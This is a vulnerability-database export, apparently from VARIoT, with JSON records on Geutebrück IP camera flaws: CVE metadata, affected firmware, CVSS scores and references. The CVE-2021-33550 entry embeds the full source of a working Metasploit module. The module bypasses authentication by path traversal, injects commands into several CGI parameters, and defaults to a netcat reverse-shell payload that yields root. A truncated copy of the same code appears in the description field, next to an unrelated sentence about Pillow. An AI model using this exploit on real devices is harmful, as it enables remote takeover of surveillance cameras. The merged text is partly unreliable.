            "id": "VHN-113377"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.7,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/96209"
          },
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/41360/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5174"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5174"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          },
          {
            "trust": 0.3,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52663"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888"
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377"
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174"
          },
          {
            "db": "BID",
            "id": "96209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "IVD",
            "id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
            "ident": null
          },
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "date": "2017-02-14T00:00:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "date": "2017-02-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "date": "2017-05-19T03:29:00.230000",
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2017-02-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01888",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-113377",
            "ident": null
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5174",
            "ident": null
          },
          {
            "date": "2017-03-07T04:02:00",
            "db": "BID",
            "id": "96209",
            "ident": null
          },
          {
            "date": "2017-06-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-004264",
            "ident": null
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-610",
            "ident": null
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-5174",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Geutebruck IP Camera G-Cam/EFD-2250 Access control vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-004264"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-610"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0859

    Vulnerability from variot - Updated: 2025-01-30 22:27

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0859",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33550",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33550",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33550",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33550",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33550",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2087",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, 